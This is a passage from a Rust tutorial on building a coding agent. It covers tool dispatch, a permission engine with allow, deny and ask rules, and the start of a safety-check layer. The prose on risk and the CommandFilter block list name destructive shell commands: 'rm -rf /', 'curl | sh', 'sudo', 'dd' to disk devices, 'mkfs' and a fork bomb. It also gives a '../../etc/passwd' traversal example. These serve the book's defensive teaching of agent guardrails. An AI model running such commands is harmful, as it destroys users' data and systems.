metadata that classifies their behavior -- whether they are read-only,
concurrent-safe, or destructive. These flags drive the permission engine,
plan mode, and concurrent execution decisions.
Here is how the tools would be categorized:
Read-only tools: ReadTool (and GlobTool, GrepTool if added)
These tools observe the filesystem without changing it. Reading a file, listing paths by glob pattern, and searching content with regex -- none of these have side effects. They are safe to run in parallel and safe to run in a read-only plan mode.
Write tools: WriteTool, EditTool
Write and Edit modify files, so they are not read-only. They are not concurrent-safe because two writes to the same file would race. But they are not destructive either -- file writes are recoverable (you can revert with git).
Destructive tools: BashTool
The BashTool is the most dangerous. It can run arbitrary shell commands --
rm -rf /, git push --force, curl | sh. A production agent would mark it
as destructive, requiring explicit user approval.
Why these categories matter
In a production agent, categories compose into a permission hierarchy:
| Category | Plan mode | Auto-approve | Default mode |
|---|---|---|---|
| Read-only | Allowed | Allowed | Allowed |
| Write | Denied | Allowed | Ask user |
| Destructive | Denied | Ask user | Ask user |
The starter does not implement these categories yet -- that is an extension
topic for later chapters. For now, the SimpleAgent executes every tool call
the LLM requests without question.
Tool dispatch flow
Here is the complete flow from the LLM requesting a tool to the result being sent back:
flowchart TD
A["LLM responds with<br/>StopReason::ToolUse"] --> B["For each ToolCall"]
B --> C{"tools.get(name)?"}
C -->|Some| D["tool.call(args)"]
C -->|None| E["Return error:<br/>unknown tool"]
D --> F["Push ToolResult<br/>into message history"]
E --> F
F --> G["Call provider.chat()<br/>with updated history"]
G --> H{"StopReason?"}
H -->|ToolUse| B
H -->|Stop| I["Return final text"]
Wiring tools to the SimpleAgent
The SimpleAgent from the earlier chapters accepts tools through its builder API. You can add tools one at a time:
#![allow(unused)] fn main() { let agent = SimpleAgent::new(provider) .tool(ReadTool::new()) .tool(WriteTool::new()) .tool(EditTool::new()) .tool(BashTool::new()); }
The .tool() method calls self.tools.push(t) internally, which extracts the tool's name from its definition and inserts it into the HashMap.
Once constructed, the agent handles the full dispatch pipeline. When the LLM responds with StopReason::ToolUse and a list of ToolCalls, the agent:
- Looks up each tool by name in the
ToolSet - Executes the tool with
call() - Packages the result as a
Message::ToolResultand appends it to the conversation
If the LLM requests a tool that does not exist in the registry, the agent returns "error: unknown tool \foo`"`. The model sees the error and can adjust.
Integration: write, read, respond
The test_multi_tool_write_and_read_flow test demonstrates a complete three-turn interaction with real tools. Let's trace through it step by step.
The setup creates a temp directory and scripts a MockProvider with three responses:
#![allow(unused)] fn main() { let dir = tempfile::tempdir().unwrap(); let path = dir.path().join("test.txt"); let path_str = path.to_str().unwrap().to_string(); let provider = MockProvider::new(VecDeque::from([ // Turn 1: write a file AssistantTurn { text: None, tool_calls: vec![ToolCall { id: "c1".into(), name: "write".into(), arguments: json!({ "path": path_str, "content": "hello from agent" }), }], stop_reason: StopReason::ToolUse, usage: None, }, // Turn 2: read it back AssistantTurn { text: None, tool_calls: vec![ToolCall { id: "c2".into(), name: "read".into(), arguments: json!({ "path": path_str }), }], stop_reason: StopReason::ToolUse, usage: None, }, // Turn 3: final answer AssistantTurn { text: Some("Done! I wrote and read the file.".into()), tool_calls: vec![], stop_reason: StopReason::Stop, usage: None, }, ])); }
The agent is built with only the tools it needs:
#![allow(unused)] fn main() { let agent = SimpleAgent::new(provider) .tool(ReadTool::new()) .tool(WriteTool::new()); }
Now trace the loop:
Turn 1 -- Write. The agent calls provider.chat(), gets back StopReason::ToolUse with a write tool call. It looks up "write" in the ToolSet, finds WriteTool, calls it with {"path": "/tmp/.../test.txt", "content": "hello from agent"}. The WriteTool creates the file on disk. The agent pushes the Message::Assistant(turn) and Message::ToolResult into the conversation history.
Message history after turn 1:
[User] "write and read a file"
[Assistant] tool_calls: [write(path, content)]
[ToolResult] "wrote /tmp/.../test.txt"
Turn 2 -- Read. The agent calls provider.chat() again with the updated history. The mock returns a read tool call. The agent looks up "read", calls ReadTool with {"path": "/tmp/.../test.txt"}. The ReadTool reads the file that WriteTool created in the previous turn and returns its content.
Message history after turn 2:
[User] "write and read a file"
[Assistant] tool_calls: [write(path, content)]
[ToolResult] "wrote /tmp/.../test.txt"
[Assistant] tool_calls: [read(path)]
[ToolResult] "hello from agent"
Turn 3 -- Final answer. The agent calls provider.chat() one more time. The mock returns StopReason::Stop with text. The agent pushes the final assistant message and returns the text to the caller.
The test verifies two things: the returned text contains "Done!", and the file actually exists on disk with the expected content. This confirms that real tools executed with real side effects inside the agent loop.
#![allow(unused)] fn main() { let result = agent.run("write and read a file").await.unwrap(); assert!(result.contains("Done!")); assert_eq!( std::fs::read_to_string(&path).unwrap(), "hello from agent" ); }
Error recovery: the hallucinated tool
The test_simple_agent_unknown_tool test demonstrates what happens when the LLM requests a tool that does not exist. This is not a hypothetical scenario -- models regularly hallucinate tool names, especially smaller models or when the tool list is long.
The mock provider scripts two responses:
#![allow(unused)] fn main() { let provider = MockProvider::new(VecDeque::from([ // LLM hallucinates a tool AssistantTurn { text: None, tool_calls: vec![ToolCall { id: "c1".into(), name: "imaginary_tool".into(), arguments: json!({}), }], stop_reason: StopReason::ToolUse, usage: None, }, // LLM recovers after seeing the error AssistantTurn { text: Some("Sorry, that tool doesn't exist.".into()), tool_calls: vec![], stop_reason: StopReason::Stop, usage: None, }, ])); let agent = SimpleAgent::new(provider).tool(ReadTool::new()); let result = agent.run("do something").await.unwrap(); assert!(result.contains("doesn't exist")); }
Here is what happens:
Turn 1. The LLM asks to call "imaginary_tool". The agent does tools.get("imaginary_tool"), gets None, and returns "error: unknown tool \imaginary_tool`". This error message is pushed into the conversation as a Message::ToolResult`. The loop continues.
Turn 2. The LLM sees the error in the conversation history and produces a text response acknowledging the mistake. The agent returns normally.
The agent did not crash. It did not panic. It did not return an Err. It treated the unknown tool as a recoverable error and let the model recover. This is the correct behavior for a production agent. Models make mistakes. The agent should be resilient to them.
The same pattern handles other failure modes: a tool that returns an execution error or a tool that encounters an I/O failure. In every case, the model sees a descriptive error message and can adjust its approach.
How Claude Code does it
Claude Code's tool registry is substantially larger, but the architecture is the same.
Scale. Claude Code registers 40+ tools spanning file operations, git, browser, notebooks, MCP (Model Context Protocol), and more. Each tool has permission metadata, cost hints, and rich terminal rendering. Our five tools (four core plus AskTool) cover the essential capabilities -- the same protocol, less surface area.
Dynamic registration. Our ToolSet is built at startup and never changes. Claude Code's registry is dynamic -- MCP tools are discovered and registered at runtime when a user configures an MCP server. A tool can appear or disappear mid-session. The ToolSet::push() method you built in Chapter 4 supports this pattern, though we do not exercise it yet.
Tool groups. Claude Code organizes tools into permission groups. File tools, git tools, and shell tools each have group-level allow/deny rules. Our flat ToolSet is simpler -- the permission engine (when implemented) would check per-tool metadata.
Usage statistics. Claude Code tracks how often each tool is called, how long each call takes, and how many tokens each result consumes. This data feeds into the TUI's status display and helps with cost estimation. Our book does not cover usage statistics, though the TokenUsage type from Chapter 4 gives you a starting point at the message level.
Despite these differences, the core protocol is identical. The LLM sees a list of tool schemas. It decides to call one. The agent looks up the tool by name, executes it, and feeds the result back. Everything else -- permissions, groups, statistics, dynamic registration -- is orchestration around that lookup.
Tests
Run the integration tests:
cargo test -p mini-claw-code-starter test_multi_tool_
Key tests:
- test_multi_tool_write_and_read_flow -- Agent writes a file then reads it back, verifying the file exists on disk with correct content.
- test_multi_tool_edit_flow -- Agent edits an existing file with string replacement and reads back the result.
- test_multi_tool_bash_then_report -- Agent runs a shell command and reports the output.
- test_multi_tool_write_edit_read_flow -- Full pipeline: write initial content, edit it, read it back. Confirms tools chain correctly.
- test_multi_tool_all_four_tools -- Agent uses bash, write, edit, and read in a single session, exercising the full tool set.
- test_multi_tool_multiple_writes -- Agent writes two separate files in sequence.
- test_multi_tool_read_multiple_files -- Agent reads two files in a single turn using parallel tool calls.
- test_multi_tool_five_step_conversation -- A five-step flow (bash, write, read, edit, read) verifying long multi-tool sessions.
- test_multi_tool_chat_basic -- Verifies the
chat()method for simple text-only responses. - test_multi_tool_chat_with_tool_call -- Verifies
chat()with tool dispatch and message history growth. - test_multi_tool_chat_multi_turn -- Two-turn conversation using
chat()with accumulating message history.
Key takeaway
The tool registry is a HashMap lookup: the LLM produces a tool name, the agent finds the matching implementation, and calls it. This indirection -- name-based dispatch through trait objects -- is what lets you add or remove tools without changing the agent loop.
Recap
Part II is complete. Over four chapters you built every tool a basic coding agent needs:
- ReadTool reads files with line numbers, offsets, and limits.
- WriteTool creates and overwrites files, creating parent directories as needed.
- EditTool performs surgical string replacements within existing files.
- BashTool executes shell commands with timeout support and exit code reporting.
- GlobTool finds files by pattern matching across the directory tree.
- GrepTool searches file contents with regex and context lines.
In this chapter you wired them all together through the ToolSet registry and connected them to the SimpleAgent. The agent can now receive a user prompt, send it to the LLM with all tool schemas, execute whatever tools the model requests, and loop until the model produces a final answer. You have a working coding agent.
But a working agent is not a safe agent. Right now, the engine executes every tool call the LLM requests without question. If the model decides to bash("rm -rf /"), the engine runs it. If it writes over your source files with garbage, the engine writes. There are no guardrails, no confirmation prompts, no safety checks. The tool flags (is_read_only, is_destructive) exist but nothing enforces them.
What's next
Part III -- Safety & Control -- adds the guardrails that turn a working agent into a trustworthy one:
- Chapter 13: Permission Engine -- The system that checks every tool call before execution. It evaluates permission rules, respects the permission mode, and asks the user when needed.
- Chapter 14: Safety Checks -- Static analysis of tool arguments. Catches dangerous patterns (
rm -rf,git push --force) before the permission prompt even appears. - Chapter 15: Hook System -- Pre-tool and post-tool hooks that run shell commands around tool execution. Lets users enforce custom policies (run linters after edits, block certain paths).
- Chapter 16: Plan Mode -- A restricted execution mode where only read-only tools run. The agent can analyze and plan but never modify. This is where
is_read_only()finally gets enforced.
The tools you built in Part II are the hands. Part III teaches the agent when to use them -- and when not to.
Check yourself
← Chapter 11: Search Tools · Contents · Chapter 13: Permission Engine →
Chapter 13: Permission Engine
File(s) to edit:
src/permissions.rsTest to run:cargo test -p mini-claw-code-starter permissionsEstimated time: 40 min
Your agent does whatever the LLM tells it to.
Think about that for a moment. In Chapters 1-12 you built a fully functional coding agent with several tools. The LLM can read files, write files, edit files, and execute arbitrary shell commands. The SimpleAgent dutifully dispatches every tool call the model requests. If the model says bash("rm -rf /"), the agent runs it. If it writes garbage over your source files, the agent writes. If it decides to curl | sh something from the internet, the agent curls. There is nothing between the LLM's request and the tool's execution.
This is fine for a tutorial. It is not fine for software you run on your actual codebase.
Chapter 13 changes that. We build the PermissionEngine -- the gatekeeper that evaluates every tool call before it executes. It sits between the SimpleAgent and the tools, and for each call it returns one of three answers: allow it silently, deny it, or ask the user for approval. The decision depends on configured rules, a default permission, and whether the user has already approved this tool during the session.
This is the first chapter of Part III: Safety & Control. By the end of it, your agent will no longer blindly obey the LLM. It will ask permission first.
cargo test -p mini-claw-code-starter permissions
Goal
- Implement
PermissionRule::matches()usingglob::Patternso rules can match tool names with wildcards (e.g.,"mcp__*"matches all MCP tools). - Build the
PermissionEnginewith its three-stage evaluation pipeline: session approvals, then ordered rules, then default permission. - Provide convenience constructors (
ask_by_default,allow_all) for common configurations. - Record session approvals so that once a user approves a tool, it stays approved for the rest of the session.
The problem: a spectrum of trust
Not every tool call is equally risky. Reading a file is harmless. Writing a file is recoverable (you can revert with git). Running rm -rf / is catastrophic. A good permission system should treat these differently.
At the same time, not every user wants the same level of control. Some users want to approve every action. Some want to approve only dangerous ones. Some are running automated pipelines and want no prompts at all. And some are in planning mode, where the agent should only observe, never modify.
This gives us two dimensions to work with:
- Tool risk level -- How dangerous is this tool?
- User trust level -- How much control does the user want? (The permission rules and default permission.)
The permission engine combines both dimensions into a single decision. Rules match tool names using glob patterns, and a default permission applies when no rule matches. This gives users fine-grained control over which tools require approval.
Permission types
The permission system introduces several new types in src/permissions.rs. Let's walk through each one.
Permission: the decision
#![allow(unused)] fn main() { #[derive(Debug, Clone, PartialEq)] pub enum Permission { /// Tool call is allowed without asking. Allow, /// Tool call is blocked without asking. Deny, /// User must be prompted for approval. Ask, } }
Three variants, one for each possible outcome. Allow means execute immediately -- no prompt, no delay. Deny means block the call entirely -- the tool never runs. Ask means pause and show the user a prompt.
In the starter, Deny and Ask are unit variants with no string payload. The caller is responsible for providing context to the user or the model when a tool call is denied or needs approval.
PermissionRule: matching tool names
#![allow(unused)] fn main() { #[derive(Debug, Clone)] pub struct PermissionRule { /// Glob pattern matching tool names (e.g. "bash", "write", "*"). pub tool_pattern: String, /// The permission to assign when the pattern matches. pub permission: Permission, } }
Rules let users assign permissions to specific tools. A PermissionRule matches tool names with a glob pattern (using the glob::Pattern crate) and assigns a permission: always allow, always deny, or always ask.
For example, you might add a rule that allows write without prompting -- because you trust the model with file writes in this particular project. Or you might add a rule that denies bash entirely -- because this is a read-heavy analysis task and you want to prevent any command execution.
The matches() method uses glob::Pattern for matching:
#![allow(unused)] fn main() { impl PermissionRule { pub fn new(tool_pattern: impl Into<String>, permission: Permission) -> Self { Self { tool_pattern: tool_pattern.into(), permission, } } /// Check if this rule matches a tool name. /// Uses glob::Pattern for pattern matching, falling back to /// exact string comparison if the pattern is invalid. pub fn matches(&self, tool_name: &str) -> bool { // Your implementation: use glob::Pattern::new(&self.tool_pattern) unimplemented!() } } }
Rules take priority over the default permission. This is the key design principle: specific overrides beat general policies.
The PermissionEngine
With the types defined, we can build the engine itself. Open src/permissions.rs:
#![allow(unused)] fn main() { pub struct PermissionEngine { rules: Vec<PermissionRule>, default_permission: Permission, /// Session-level overrides (tool calls the user has already approved). session_allows: std::collections::HashSet<String>, } }
Three fields:
rules-- An ordered list of permission rules. First match wins.default_permission-- The fallback permission when no rule matches. TypicallyPermission::Askfor interactive use orPermission::Allowfor bypass mode.session_allows-- A set of tool names the user has approved during this session.
The constructors provide common configurations:
#![allow(unused)] fn main() { impl PermissionEngine { pub fn new(rules: Vec<PermissionRule>, default_permission: Permission) -> Self { // Your implementation: store rules, default_permission, and empty session_allows HashSet unimplemented!() } /// Create an engine that asks for everything by default. pub fn ask_by_default(rules: Vec<PermissionRule>) -> Self { Self::new(rules, Permission::Ask) } /// Create an engine that allows everything (no permission checks). pub fn allow_all() -> Self { Self::new(vec![], Permission::Allow) } } }
ask_by_default() is the standard interactive configuration -- every tool that is not covered by a rule prompts the user. allow_all() is the bypass mode -- no rules, no prompts. Session approvals start empty and accumulate as the user interacts with the agent.
The evaluate pipeline
The core of the engine is the evaluate method. It takes a tool name and the tool arguments, and returns a Permission. The pipeline has three stages, evaluated in order. The first stage that produces a definitive answer wins.
flowchart TD
A["evaluate(tool_name, args)"] --> B{"tool_name in<br/>session_allows?"}
B -->|Yes| C["Return Allow"]
B -->|No| D{"Any rule<br/>matches?"}
D -->|Yes| E["Return rule.permission"]
D -->|No| F["Return default_permission"]
#![allow(unused)] fn main() { pub fn evaluate(&self, tool_name: &str, _args: &Value) -> Permission { // Stage 1: session approvals if self.session_allows.contains(tool_name) { return Permission::Allow; } // Stage 2: rules in order (first match wins) for rule in &self.rules { if rule.matches(tool_name) { return rule.permission.clone(); } } // Stage 3: default self.default_permission.clone() } }
Let's walk through each stage.
Stage 1: Session approvals
#![allow(unused)] fn main() { if self.session_allows.contains(tool_name) { return Permission::Allow; } }
If the user has already approved this tool during the current session, allow it immediately. Session approvals are recorded when the user says "yes" to an Ask prompt. Once approved, the tool runs without prompting for the rest of the session.
Session approvals are per-tool, not global. Approving write does not approve bash. This is deliberate -- the user should make a conscious choice for each tool they trust.
Stage 2: Permission rules
#![allow(unused)] fn main() { for rule in &self.rules { if rule.matches(tool_name) { return rule.permission.clone(); } } }
If no session approval matched, we check the configured rules. Rules are evaluated in order -- the first rule whose matches() method returns true wins.
This is a critical design choice: first match wins. If you have two rules:
1. bash -> Deny
2. * -> Allow
Then bash hits rule 1 and is denied. Everything else hits rule 2 and is allowed. If the order were reversed, rule 2 would match everything first and rule 1 would never fire.
The matches() method uses glob::Pattern for matching, which gives you more expressive patterns than simple string comparison. "bash" matches only "bash". "*" matches everything. "file_*" matches "file_read", "file_write", etc.
Stage 3: Default permission
#![allow(unused)] fn main() { self.default_permission.clone() }
If no session approval matched and no rule matched, fall back to the default permission set at construction time. For ask_by_default(), this is Permission::Ask. For allow_all(), this is Permission::Allow.
Key Rust concept: the glob::Pattern crate
The glob crate provides filesystem-style pattern matching. glob::Pattern::new("mcp__*") compiles a pattern, and .matches("mcp__fs__read") tests a string against it. The key operators are * (match any sequence of characters), ? (match any single character), and [abc] (match any character in the set). Unlike regex, glob patterns are intentionally simple -- they match whole strings, not substrings, and have no backtracking. This makes them fast and easy to reason about for tool name matching.
The Pattern::new() call returns a Result because the pattern string might be syntactically invalid (e.g., an unclosed bracket). The fallback to exact string comparison handles this edge case gracefully.
Pattern matching with glob
The PermissionRule::matches() method uses the glob crate for pattern matching:
#![allow(unused)] fn main() { pub fn matches(&self, tool_name: &str) -> bool { glob::Pattern::new(&self.tool_pattern) .map(|p| p.matches(tool_name)) .unwrap_or(self.tool_pattern == tool_name) } }
Two cases:
- Valid glob pattern --
glob::Pattern::new()succeeds. The pattern is matched against the tool name using glob semantics:"*"matches everything,"file_*"matches"file_read","file_write", etc., and"bash"matches only"bash". - Invalid glob -- Falls back to exact string comparison. This is a safety net -- in practice, tool name patterns are simple and always valid.
Using glob::Pattern instead of hand-rolled matching gives us full glob semantics -- character classes ([abc]), alternatives, and proper wildcard handling -- with no custom code.
Session approvals
When evaluate returns Permission::Ask, the caller (typically the SimpleAgent or UI layer) prompts the user. If the user says yes, the caller records the approval:
#![allow(unused)] fn main() { pub fn record_session_allow(&mut self, tool_name: &str) { self.session_allows.insert(tool_name.to_string()); } }
Subsequent calls to evaluate for the same tool will find it in the session_allows set (stage 1) and return Permission::Allow without prompting again.
The engine also provides convenience methods for checking permission outcomes:
#![allow(unused)] fn main() { pub fn is_allowed(&self, tool_name: &str, args: &Value) -> bool { matches!(self.evaluate(tool_name, args), Permission::Allow) } pub fn needs_approval(&self, tool_name: &str, args: &Value) -> bool { matches!(self.evaluate(tool_name, args), Permission::Ask) } }
Three properties of session approvals are worth emphasizing:
- Per-tool, not global. Approving
writedoes not approvebash. Each tool is a separate trust decision. - Session-scoped, not persistent. Approvals live in memory and vanish when the process exits. There is no file, no database, no persistence. If you restart the agent, you start with a clean slate.
- Above rules in priority. In the starter, session approvals are checked first (stage 1), so an approval overrides any rule. This is a deliberate simplification -- once the user says yes, the tool is approved for the session regardless of rules.
Putting it all together: a complete trace
Let's trace through a realistic scenario to see how the pipeline works end to end.
A user starts the agent with ask_by_default and one rule: write is always allowed.
#![allow(unused)] fn main() { let engine = PermissionEngine::ask_by_default(vec![ PermissionRule::new("write", Permission::Allow), ]); }
Now the LLM makes three tool calls in sequence. Here is what happens at each one:
Call 1: read("src/main.rs")
Stage 1: "read" not in session_allows. -> continue
Stage 2: Rule "write" does not match "read". No more rules. -> continue
Stage 3: Default permission is Ask. -> Ask
Result: Ask. The UI prompts the user. (Note: in the starter there are no is_read_only() flags on tools, so read tools go through the same pipeline as any other tool.)
Call 2: write("src/main.rs", ...)
Stage 1: "write" not in session_allows. -> continue
Stage 2: Rule "write" matches "write". Permission: Allow. -> Allow
Result: Allow. The write executes silently -- the rule overrides what the default permission would normally do (ask the user).
Call 3: bash("cargo test")
Stage 1: "bash" not in session_allows. -> continue
Stage 2: Rule "write" does not match "bash". No more rules. -> continue
Stage 3: Default permission is Ask. -> Ask
Result: Ask. The UI prompts the user. If the user approves, the caller calls engine.record_session_allow("bash"), and subsequent bash calls will be allowed via stage 1.
How the engine integrates with the SimpleAgent
The PermissionEngine is designed to be called from inside the SimpleAgent's tool execution flow. The integration point is conceptually simple:
For each tool call from the LLM:
1. Look up the tool in the ToolSet
2. Call permission_engine.evaluate(tool_name, args)
3. Match on the Permission:
- Allow -> execute the tool
- Deny -> return an error string to the LLM
- Ask -> prompt the user, then execute or deny
We will wire this up fully in later chapters. For now, the PermissionEngine is a standalone component with a clean interface: give it a tool name and arguments, get back a decision. This separation makes it testable in isolation -- which is exactly what the chapter 10 tests do.
How Claude Code does it
Claude Code's permission system follows the same architecture but with more granularity.
Permission modes. Claude Code has the same core modes -- a default interactive mode, an auto-approve mode, and a plan mode. The mode is set via CLI flags (--dangerously-skip-permissions for bypass, --plan for plan mode) or interactively during the session.
Tool groups. Rather than individual tool flags, Claude Code organizes tools into permission groups. File tools, git tools, shell tools, and MCP tools each have group-level policies. A single rule can allow or deny an entire group. Our glob-based tool patterns achieve a similar effect with patterns like "file_*".
Per-path rules. Claude Code's rules can match not just tool names but also tool arguments -- specifically file paths. A rule like "allow write to src/**" permits writes within the source directory but blocks writes elsewhere. Our rules match only on tool names, which is simpler but less precise.
Session approvals. Claude Code's session approval system works the same way -- once the user approves a tool, it stays approved for the session. The approval is per-tool-name, stored in memory, and cleared on session reset.
Layered evaluation. The evaluation pipeline is the same: check session approvals, then match rules, then fall back to defaults. The ordering ensures that specific policies override general ones, just as in our implementation.
The core insight is the same in both systems: the permission engine is a function from (rules, session_state, default_permission) to Permission. It does not execute tools. It does not modify state (except session approvals). It just answers the question: should this tool call proceed?
Tests
Run the permission engine tests:
cargo test -p mini-claw-code-starter permissions
Key tests:
- test_permissions_allow_all --
allow_all()returnsAllowfor every tool, confirming bypass mode works. - test_permissions_ask_by_default --
ask_by_default()with no rules returnsAskfor any tool. - test_permissions_rule_matching -- Three explicit rules for
read,bash, andwritereturn their respective permissions. - test_permissions_glob_pattern -- A glob rule
"mcp__*"matches"mcp__fs__read"but not"read". - test_permissions_first_rule_wins -- Two rules for
"bash"(Allow then Deny); first match wins, so Allow is returned. - test_permissions_session_allow -- After
record_session_allow("bash"), a tool that previously returned Ask now returns Allow. - test_permissions_session_allow_per_tool -- Approving
"read"does not approve"write"-- session approvals are per-tool. - test_permissions_is_allowed / test_permissions_needs_approval -- Convenience methods correctly reflect the underlying
evaluate()result. - test_permissions_wildcard_rule -- A
"*"rule overrides the default permission for all tools. - test_permissions_deny_overrides_default -- A Deny rule for
"dangerous"blocks it even when the default is Allow.
Key takeaway
The permission engine is a pure function from (tool_name, rules, session_state, default) to Permission. It does not execute tools or interact with the user -- it just answers the question "should this proceed?" This separation makes it trivially testable and reusable across different UI contexts.
Recap
In this chapter you built the PermissionEngine -- the gatekeeper between the LLM's requests and your tools. The key ideas:
- Three outcomes --
Allow,Deny,Ask. Every tool call gets one of these before it runs. - Ordered pipeline -- Session approvals first, then rules, then default permission. Specific policies beat general ones.
- Glob-pattern rules -- Rules use
glob::Patternfor tool name matching. The first matching rule wins. This gives users fine-grained control over which tools require approval. - Session approvals -- Once the user says yes, that tool is approved for the session. Per-tool, in-memory, not persistent.
- Convenience constructors --
ask_by_default()for interactive use,allow_all()for bypass mode.
The engine is pure logic -- it does not execute tools, and it does not interact with the user. It takes a tool name and arguments, and returns a decision. This separation makes it testable, composable, and easy to reason about.
What's next
The permission engine decides whether a tool call should run based on who the tool is and what mode the user is in. But it does not look at what the tool is being asked to do. A bash tool is bash whether it runs ls or rm -rf /. A write tool is a write tool whether it targets src/main.rs or .env.
Chapter 14 adds safety checks -- static analysis of tool arguments that catches dangerous patterns before the permission prompt even appears. It validates paths against allowed directories, matches filenames against protected patterns (.env, .git/config), and filters bash commands for blocked patterns (rm -rf /, sudo, fork bombs). Safety checks wrap tools so that dangerous calls are blocked before they execute.
Check yourself
← Chapter 12: Tool Registry · Contents · Chapter 14: Safety Checks →
Chapter 14: Safety Checks
File(s) to edit:
src/safety.rsTest to run:cargo test -p mini-claw-code-starter safetyEstimated time: 40 min
The permission engine from Chapter 13 gates every tool call -- it decides whether to allow, deny, or ask the user before execution proceeds. But it makes that decision based on the tool, not the arguments. A write call in auto mode is allowed regardless of whether the target path is src/main.rs or .env. A bash call in default mode prompts the user whether the command is ls or rm -rf /. The permission engine knows who is knocking. It does not look at what they are carrying.
Safety checks fill that gap. The SafetyChecker performs static analysis on tool arguments before the permission engine runs. It examines the actual path being written or the actual command being executed, and blocks operations that are dangerous regardless of what the permission mode says. This is defense-in-depth: even if the permission engine would allow a tool call, the safety checker can still reject it.
Why two layers? Because they protect against different failure modes. The permission engine protects against the LLM doing things the user did not authorize. The safety checker protects against the LLM doing things that are never safe -- writing to .env, running rm -rf /, executing a fork bomb. A user who sets bypass mode is saying "I trust the agent." The safety checker says "trust has limits."
cargo test -p mini-claw-code-starter safety
Goal
- Implement
PathValidatorto confine file operations to a single directory tree, blocking path traversal attacks like../../etc/passwd. - Implement
CommandFilterto block dangerous shell commands (rm -rf /,sudo, fork bombs) using glob pattern matching. - Implement
ProtectedFileCheckto prevent writes and edits to sensitive files matching protected patterns (.env,.git/config). - Wire all checks together through
SafeToolWrapperso that any single safety failure blocks the tool call and returns a descriptive error to the LLM.
The SafetyCheck trait and implementations
The safety system lives in src/safety.rs. Unlike the reference implementation which uses a single SafetyChecker struct, the starter uses a trait-based design with three focused implementations and a wrapper.
The SafetyCheck trait
#![allow(unused)] fn main() { pub trait SafetyCheck: Send + Sync { fn check(&self, tool_name: &str, args: &Value) -> Result<(), String>; } }
Each safety check implements this trait. It receives the tool name and arguments, and returns Ok(()) to allow execution or Err(reason) to block it. The trait requires Send + Sync because safety checks are stored inside SafeToolWrapper, which implements Tool and may be shared across async tasks.
Key Rust concept: Send + Sync trait bounds
The Send + Sync bounds on SafetyCheck are required because tools live inside Box<dyn Tool>, which is stored in a HashMap that the agent holds. In an async runtime like tokio, the agent's futures may be moved between threads. Send means the type can be transferred to another thread. Sync means &self references can be shared between threads. Together they guarantee that the safety check can be called from any async task without data races. Without these bounds, the compiler would refuse to store Box<dyn SafetyCheck> inside SafeToolWrapper, because SafeToolWrapper itself must be Send + Sync to satisfy the Tool trait.
PathValidator
#![allow(unused)] fn main() { pub struct PathValidator { allowed_dir: PathBuf, raw_dir: PathBuf, } }
The PathValidator confines file operations to a single directory tree. It canonicalizes the allowed directory at construction time, then validates each path argument against it. The agent cannot write to /etc/passwd or edit ~/.ssh/authorized_keys even if the LLM asks nicely.
The validate_path method resolves relative paths against raw_dir, canonicalizes the result (or its parent for new files), and checks starts_with against allowed_dir. The SafetyCheck implementation only fires for tools that take a path argument (read, write, edit).
CommandFilter
#![allow(unused)] fn main() { pub struct CommandFilter { blocked_patterns: Vec<glob::Pattern>, } }
The CommandFilter checks bash commands against a list of blocked glob patterns. rm -rf / deletes everything. sudo escalates privileges. :(){:|:&};: is a fork bomb that crashes the system. These are never safe to run, regardless of context.
The default_filters() constructor provides a sensible starting point:
#![allow(unused)] fn main() { pub fn default_filters() -> Self { Self::new(&[ "rm -rf /".into(), "rm -rf /*".into(), "sudo *".into(), "> /dev/sda*".into(), "mkfs.*".into(), "dd if=*of=/dev/*".into(), ":(){:|:&};:".into(), ]) } }
ProtectedFileCheck
#![allow(unused)] fn main() { pub struct ProtectedFileCheck { patterns: Vec<glob::Pattern>, } }
The ProtectedFileCheck blocks writes and edits to files matching protected glob patterns. It checks both the full path and just the filename against each pattern, so a pattern like .env matches /project/.env regardless of directory.
The SafeToolWrapper
The SafeToolWrapper is the glue that connects safety checks to the tool system:
#![allow(unused)] fn main() { pub struct SafeToolWrapper { inner: Box<dyn Tool>, checks: Vec<Box<dyn SafetyCheck>>, } }
It wraps a Box<dyn Tool> with a Vec<Box<dyn SafetyCheck>>. When call() is invoked, it runs all safety checks first. If any check returns Err, the wrapper returns Ok(format!("error: safety check failed: {reason}")) -- note that it returns Ok with an error message string, not Err. This is because in the starter, Tool::call returns anyhow::Result<String>, and a safety denial is not a system error -- it is a controlled rejection that the LLM should see and adapt to.
#![allow(unused)] fn main() { #[async_trait] impl Tool for SafeToolWrapper { fn definition(&self) -> &ToolDefinition { self.inner.definition() } async fn call(&self, args: Value) -> anyhow::Result<String> { // Run all safety checks. If any returns Err, return the error as a string. // Otherwise, call the inner tool. unimplemented!() } } }
The with_check convenience constructor wraps a single check:
#![allow(unused)] fn main() { pub fn with_check(tool: Box<dyn Tool>, check: impl SafetyCheck + 'static) -> Self { Self::new(tool, vec![Box::new(check)]) } }
This design means safety checks are composable. You can wrap a tool with a PathValidator, a CommandFilter, and a ProtectedFileCheck all at once -- each runs independently, and any single failure blocks the call.
How the checks dispatch
flowchart LR
A["SafeToolWrapper.call(args)"] --> B["PathValidator"]
A --> C["CommandFilter"]
A --> D["ProtectedFileCheck"]
B -->|"read/write/edit"| E{"Path inside<br/>allowed_dir?"}
C -->|"bash"| F{"Command<br/>matches blocked<br/>pattern?"}
D -->|"write/edit"| G{"Filename<br/>matches protected<br/>pattern?"}
E -->|No| H["Err: blocked"]
E -->|Yes| I["Ok"]
F -->|Yes| H
F -->|No| I
G -->|Yes| H
G -->|No| I
I --> J["Inner tool.call(args)"]
H --> K["Return error string<br/>to LLM"]
Each SafetyCheck implementation decides which tools it applies to by matching on the tool_name parameter in its check method:
PathValidator-- Fires forread,write, andedit. Extracts thepathargument and validates it against the allowed directory.CommandFilter-- Fires only forbash. Extracts thecommandargument and checks it against blocked patterns.ProtectedFileCheck-- Fires forwriteandedit. Extracts thepathargument and checks both the full path and filename against protected patterns.
Tools that do not match any check pass through unchecked. Read-only tools like read are checked by PathValidator (to enforce directory boundaries) but not by ProtectedFileCheck (reading .env is not dangerous -- the danger is in writing to sensitive files).
Each check returns Ok(()) for tools it does not handle, so wrapping a tool with an irrelevant check is harmless -- it just passes through.
Path validation
The PathValidator::validate_path method implements directory containment checking:
